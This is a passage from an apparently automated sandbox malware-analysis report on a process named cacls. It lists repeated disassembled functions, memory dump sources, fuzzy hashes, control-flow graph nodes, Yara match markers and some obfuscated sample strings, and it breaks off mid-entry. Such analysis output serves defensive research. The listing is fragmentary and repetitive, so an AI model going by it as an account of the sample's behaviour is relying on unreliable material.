                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7d81e87077be4014271b49fbeb97d602d364397d8208a134b78446e5a3a18f47
                                                  • Instruction ID: 132118fbac7011a346140ef5152e23a5d12949e8a6efd86ab5530728a265948f
                                                  • Opcode Fuzzy Hash: 7d81e87077be4014271b49fbeb97d602d364397d8208a134b78446e5a3a18f47
                                                  • Instruction Fuzzy Hash: 5A900261B01504424140B15848044066005D7F1301395C116B4554960D8B188D55966D
                                                  Function 03442B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b653407c5e74aeb95aca243a2e8581849e46db1596c8a7fbe162f924500ef364
                                                  • Instruction ID: 11ef8b9acc6d4724046d0bc45293269af8cabdbddba5f2dd758cf8b0e72c876a
                                                  • Opcode Fuzzy Hash: b653407c5e74aeb95aca243a2e8581849e46db1596c8a7fbe162f924500ef364
                                                  • Instruction Fuzzy Hash: 36900261702404034105B1584414616400AC7F0201B55C022F5014990ECB258D916529
                                                  Function 03442BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 143e008b7bd7993a47d44cca0d0a3152ca1c59dddc71214db4e81ad982904968
                                                  • Instruction ID: 1226af9e6c2b66fd7d032baefe4b5bb4f7cdde55f0d6e19ee29e6c361b1284a2
                                                  • Opcode Fuzzy Hash: 143e008b7bd7993a47d44cca0d0a3152ca1c59dddc71214db4e81ad982904968
                                                  • Instruction Fuzzy Hash: 1290023170544C42D140B1584404A460015C7E0305F55C012B4064A94E9B258E55BA65
                                                  Function 03442BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5ea23d3ac106217cf3b355a6802a5dde43e534e91e6c04f912583cabec4686b4
                                                  • Instruction ID: 068c0c1eaf2ab5a23b061f228c35657f1a97ae188bbc761e2785bae2bf7e2f43
                                                  • Opcode Fuzzy Hash: 5ea23d3ac106217cf3b355a6802a5dde43e534e91e6c04f912583cabec4686b4
                                                  • Instruction Fuzzy Hash: F790023170140C02D180B158440464A0005C7E1301F95C016B4025A54ECF158F597BA5
                                                  Function 03442BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51c17d2cef2d9c0df14e19eea6df9ffebfa0e70b9b6ae87fb5e050483d37a7f6
                                                  • Instruction ID: f04b1d4c1e44560942a338ef7360e7be62b83d477e8b515cc0ef0bada1016980
                                                  • Opcode Fuzzy Hash: 51c17d2cef2d9c0df14e19eea6df9ffebfa0e70b9b6ae87fb5e050483d37a7f6
                                                  • Instruction Fuzzy Hash: 1E900231B0540C02D150B15844147460005C7E0301F55C012B4024A54E8B558F557AA5
                                                  Function 03442AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 604a3100ee83a4712f9e701aa35d31380bfb5c203b1aba9e6cff54e0be447d7e
                                                  • Instruction ID: 790e171607af19f76e322a7f0cec754e5fe91916757dba74997243cd05fa4029
                                                  • Opcode Fuzzy Hash: 604a3100ee83a4712f9e701aa35d31380bfb5c203b1aba9e6cff54e0be447d7e
                                                  • Instruction Fuzzy Hash: ED900435711404030105F55C07045070047C7F5351355C033F5015D50DDF31CD715535
                                                  Function 03442AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ca175408fb19107b1d62b85b410dbc9602dfb4cfb248df1f3caa08f2133a917
                                                  • Instruction ID: f8fcf3e1d652f05bd42c685eb062d62be1d3127e883d2e90d66680051b2de69a
                                                  • Opcode Fuzzy Hash: 8ca175408fb19107b1d62b85b410dbc9602dfb4cfb248df1f3caa08f2133a917
                                                  • Instruction Fuzzy Hash: FD900225721404020145F558060450B0445D7E6351395C016F5416990DCB218D655725
                                                  Function 03442F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2881bccb257ee6f3e620d1f4f67bb12959ce859298b4b2bda82b8da1896f785a
                                                  • Instruction ID: 32927e311e9d843bb785513de3eb92d9522a8e254be36d51200d9f3fa92f416c
                                                  • Opcode Fuzzy Hash: 2881bccb257ee6f3e620d1f4f67bb12959ce859298b4b2bda82b8da1896f785a
                                                  • Instruction Fuzzy Hash: A290026174140842D100B1584414B060005C7F1301F55C016F5064954E8B19CD52652A
                                                  Function 03442FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dde774ab8f6e421609403cc3644f53a1fd81b2d03c975035de902557cd956e10
                                                  • Instruction ID: ba9af3d1ce5e4163c672b3d2effc75f6685a06659a827389bba365f57b5cfcc8
                                                  • Opcode Fuzzy Hash: dde774ab8f6e421609403cc3644f53a1fd81b2d03c975035de902557cd956e10
                                                  • Instruction Fuzzy Hash: 5F900221711C0442D200B5684C14B070005C7E0303F55C116B4154954DCF158D615925
                                                  Function 03442FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f3584f1a25c30761d57c0a9a42116c85c55aefa765d5c07737bc4e142e73a48
                                                  • Instruction ID: fe16c6d640a9cd133812a5e92da0aceefc3039951e49ac4506af989133a5e9e7
                                                  • Opcode Fuzzy Hash: 3f3584f1a25c30761d57c0a9a42116c85c55aefa765d5c07737bc4e142e73a48
                                                  • Instruction Fuzzy Hash: 02900221B01404424140B16888449064005EBF1211755C122B4998950E8B598D655A69
                                                  Function 03442EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0af6a407b3101aeea0b1b10c12c505a772074f80f868771f94bc2af9a683f38b
                                                  • Instruction ID: 1faf4c6e55554890fff70b560d0cca72cf4ffb866d3527fa917ebf5357bb74ce
                                                  • Opcode Fuzzy Hash: 0af6a407b3101aeea0b1b10c12c505a772074f80f868771f94bc2af9a683f38b
                                                  • Instruction Fuzzy Hash: 5690026170180803D140B55848046070005C7E0302F55C012B6064955F8F298D516539
                                                  Function 03442E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2973f5ae996499a8d4ece0c3750910fa7f6255676b7b05903545d855f12485a1
                                                  • Instruction ID: 296eaf80706d9cec9fc55f1696297e87bce54ae49fcfdb2ca078b694e1c5d7d7
                                                  • Opcode Fuzzy Hash: 2973f5ae996499a8d4ece0c3750910fa7f6255676b7b05903545d855f12485a1
                                                  • Instruction Fuzzy Hash: 0B900221B0140902D101B1584404616000AC7E0241F95C023B5024955FCF258E92A535
                                                  Function 03442D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3a0881a680f63cd2c01baca33e4f90199fa6a4b3f80fcc1940268a91b29137b1
                                                  • Instruction ID: 5f03cb128001f9d9c6fb073dbba03a1de2b86fef8a47571b2c1fc8ca92e49c63
                                                  • Opcode Fuzzy Hash: 3a0881a680f63cd2c01baca33e4f90199fa6a4b3f80fcc1940268a91b29137b1
                                                  • Instruction Fuzzy Hash: F190022971340402D180B158540860A0005C7E1202F95D416B4015958DCF158D695725
                                                  Function 03442D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0ac8af460623f78d69fa322a24b7369b0afcf31da27585120e9bbc4a501dcdc0
                                                  • Instruction ID: 2823eba86a7d063dca1b673916af36fbda17889606bb39909ae00c4b724d7da6
                                                  • Opcode Fuzzy Hash: 0ac8af460623f78d69fa322a24b7369b0afcf31da27585120e9bbc4a501dcdc0
                                                  • Instruction Fuzzy Hash: F590043170140403D140F15C541C7074005D7F1301F55D013F4414D54DDF15CD575737
                                                  Function 03442DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: cc1c04666dc17828e316bd7bd0fc1390bf917e8a782370d5c9a3ccc04f0cadab
                                                  • Instruction ID: ec3ea3564ee9ad940a11cb4bf87ee7fb982e58635ca6e2a77366258cb1a501b9
                                                  • Opcode Fuzzy Hash: cc1c04666dc17828e316bd7bd0fc1390bf917e8a782370d5c9a3ccc04f0cadab
                                                  • Instruction Fuzzy Hash: 74900221742445525545F15844045074006D7F0241795C013B5414D50D8B269D56DA25
                                                  Function 03442DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1557cff150bec14c2f618f7994b23af48452bf7d4316cb322c75c76e4d82e36e
                                                  • Instruction ID: 84e9b48995999afed22fb2d264348a7299a6e3bc852c9b784bb06fe4f33abf34
                                                  • Opcode Fuzzy Hash: 1557cff150bec14c2f618f7994b23af48452bf7d4316cb322c75c76e4d82e36e
                                                  • Instruction Fuzzy Hash: 0F90023170140813D111B15845047070009C7E0241F95C413B4424958E9B568E52A525
                                                  Function 03442C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7a7f36fcbd5cd6c6b0df23b76067bf39e2894ce08342df3c4ec48726dcc1d20e
                                                  • Instruction ID: e65c1654f50f251056c38c5db84aed96a16cc143976a7325b2c8ca2d099a8db5
                                                  • Opcode Fuzzy Hash: 7a7f36fcbd5cd6c6b0df23b76067bf39e2894ce08342df3c4ec48726dcc1d20e
                                                  • Instruction Fuzzy Hash: 8690023170140C42D100B1584404B460005C7F0301F55C017B4124A54E8B15CD517925
                                                  Function 03442C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 79705ed3677ec00387ba433266cf944c2e4b130f64e23cbbaad893d15d9dcc1b
                                                  • Instruction ID: 3c4011afdb62b7eda09a23605465de4ff7934758b94483fbbe4c5d8437f6b0d8
                                                  • Opcode Fuzzy Hash: 79705ed3677ec00387ba433266cf944c2e4b130f64e23cbbaad893d15d9dcc1b
                                                  • Instruction Fuzzy Hash: 9C90023170148C02D110B158840474A0005C7E0301F59C412B8424A58E8B958D917525
                                                  Function 03442CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9f2fb2cba426d77f7a38f060cc557f96166544f601460300a78c3af9c9005fdb
                                                  • Instruction ID: d4b2143864469e8cad8e8398510902884263dea5e3500c66a42791a8016039d9
                                                  • Opcode Fuzzy Hash: 9f2fb2cba426d77f7a38f060cc557f96166544f601460300a78c3af9c9005fdb
                                                  • Instruction Fuzzy Hash: 2A90023170140802D100B59854086460005C7F0301F55D012B9024955FCB658D916535
                                                  Function 034435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: db4f22ff9d64bbb87f13b92a5ef9410748566ae0d63caefe14c70d4e9852c1ab
                                                  • Instruction ID: dffe0009a13109df3f385fb25bae79dc44f3e9d345da7cdc95528135d2b3f822
                                                  • Opcode Fuzzy Hash: db4f22ff9d64bbb87f13b92a5ef9410748566ae0d63caefe14c70d4e9852c1ab
                                                  • Instruction Fuzzy Hash: E7900231B0550802D100B15845147061005C7E0201F65C412B4424968E8B958E5169A6
                                                  Function 034439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                                  • Associated: 00000008.00000002.2621426277.00000000034F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.00000000034FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_33d0000_cacls.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1e0dd3561729d25e933b0f9263c0cb33a32a7284ce33874cd4bb1f85c4a66c9a
                                                  • Instruction ID: 5809c23d7c3ff827029d3da5e55b1a6831f93bb12d8a9b12d2ba3b0e01bfcf26
                                                  • Opcode Fuzzy Hash: 1e0dd3561729d25e933b0f9263c0cb33a32a7284ce33874cd4bb1f85c4a66c9a
                                                  • Instruction Fuzzy Hash: A290022174545502D150B15C44046164005E7F0201F55C022B4814994E8B558D556625
                                                  Function 02C60C3F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 75threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 367 2c60c3f-2c60c4a 368 2c60bf6 367->368 369 2c60c4c-2c60c53 367->369 371 2c60c21-2c60c39 368->371 372 2c60bf8-2c60c20 368->372 370 2c60cba-2c60cfb call 2c643c0 call 2c513e0 call 2c71a60 369->370 382 2c60d1d-2c60d22 370->382 383 2c60cfd-2c60d0e PostThreadMessageW 370->383 371->370 372->371 383->382 384 2c60d10-2c60d1a 383->384 384->382
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02C60D0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c50000_cacls.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: -69O$-q<$G8uE$G8uE-69OL$G8uE-69OL
                                                  • API String ID: 1836367815-1308402997
                                                  • Opcode ID: 1eb680f3f770388709fc08d3fca6499f23252361c9ab653b653476f08cc35219
                                                  • Instruction ID: 7573debf9ec86cc886433d4fb23bf08006c2bfe89bf3214d049839719f29a5f2
                                                  • Opcode Fuzzy Hash: 1eb680f3f770388709fc08d3fca6499f23252361c9ab653b653476f08cc35219
                                                  • Instruction Fuzzy Hash: DC11AB73E4112436CB119E94DC85FEFBBA9EB80B10F044155F604BB001DB74E60697A4
                                                  Function 02C60C55 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 443 2c60c55-2c60c5d 444 2c60c5f-2c60c80 443->444 445 2c60c9d-2c60cde call 2c7b3f0 call 2c7be00 call 2c643c0 call 2c513e0 call 2c71a60 443->445 447 2c60c82 444->447 448 2c60ce1-2c60cfb 444->448 445->448 450 2c60c83 447->450 451 2c60d1d-2c60d22 448->451 452 2c60cfd-2c60d0e PostThreadMessageW 448->452 450->450 454 2c60c85-2c60c8e 450->454 452->451 455 2c60d10-2c60d1a 452->455 454->445 455->451
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02C60D0A
                                                  Strings
                                                  Memory Dump Source
